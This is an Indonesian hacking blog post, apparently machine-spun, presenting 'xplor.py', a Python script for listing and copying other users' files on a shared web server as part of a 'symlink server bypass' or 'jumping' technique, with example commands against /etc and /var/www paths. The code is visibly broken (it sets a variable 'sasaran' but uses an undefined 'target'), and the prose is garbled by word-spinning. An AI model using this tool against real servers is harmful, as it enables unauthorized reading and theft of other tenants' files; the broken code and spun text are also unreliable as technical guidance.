-->
search

iklan banner

✔ Server Bypass Melalui Symlink - Jumping Bab 2

By Sabtu, 07 Januari 2017 Add Comment Edit
Server Bypass melalui symlink - Jumping Bagian 2 - Salam X-WaHz All About Info :) Mari kita pergi dengan metode berikutnya dari server symlink melewati, menyerupai u melihat dan ke dalam sebelum posting kini saya akan menjelaskan trik gres dengan lainnya kita akan berbicara perihal alat lain yang memakai izin python untuk membaca folder lain / file dalam server yang sama. Alat yang disebut xplor.py dan di sini itu sumbernya

#!/usr/bin/env python
# devilzc0de.org (c) 2012
import sys
import os

def copyfile(source, dest, buffer_size=1024*1024):
    if not hasattr(source, 'read'):
        source = open(source, 'rb')
    if not hasattr(dest, 'write'):
        dest = open(dest, 'wb')
    while 1:
        copy_buffer = source.read(buffer_size)
        if copy_buffer:
            dest.write(copy_buffer)
        else:
            break
    source.close()
    dest.close()

if __name__=="__main__":
    if not len(sys.argv) == 3 and not len(sys.argv) == 2:
        sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')
        sys.exit(1)
   
    sasaran = sys.argv[1].replace("\\","/")
    if os.path.isdir(target):
        if not target.endswith("/"):
            sasaran = sasaran + "/"
        dir = os.listdir(target)
        for d in dir:
            fs = ""
            if os.path.isdir(target + d):
                fs = "[ DIR ]"
            elif os.path.isfile(target + d):
                fs = os.path.getsize(target + d)
                fs = str(fs)
               
            sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
    elif os.path.isfile(target):
        if len(sys.argv) == 3:
            copyfile(target, sys.argv[2])
        else:
            f = open(target, "rb")
            try:
                byte = f.read(1024)
                sys.stdout.write(byte)
                sys.stdout.flush()
                while byte != "":
                    byte = f.read(1024)
                    sys.stdout.write(byte)
                    sys.stdout.flush()
            finally:
                f.close()
    else:
        sys.stdout.write("Can't found file or folder : " + target)



pengujian script python xplor.py


Pengguna alat untuk melihat folder di mana tidak mempunyai izin untuk membaca di dalam python xplor.py / var / www / index.php



Melihat file dalam folder tidak ada akses. python xplor.py / var / www / index.php



menyalin / menyimpan file ur python xplor.py / var / www / indro / ketek.jpg

Mari kita pergi dengan metode berikutnya dari server symlink melewati ✔ Server Bypass melalui symlink - Jumping Bagian 2

  Dan yeah file itu ada di sini susukan
Mari kita pergi dengan metode berikutnya dari server symlink melewati ✔ Server Bypass melalui symlink - Jumping Bagian 2


Yeahh itu diberikan Beberapa u hal yang sanggup Anda lakukan dengan script-script lain 
di perl webs.pl dan xplor.pl menikmatinya :)

Sumber

Sumber http://x-wahz.blogspot.com/

Berlangganan update artikel terbaru via email:

0 Response to "✔ Server Bypass Melalui Symlink - Jumping Bab 2"

Posting Komentar

Langganan: Posting Komentar (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel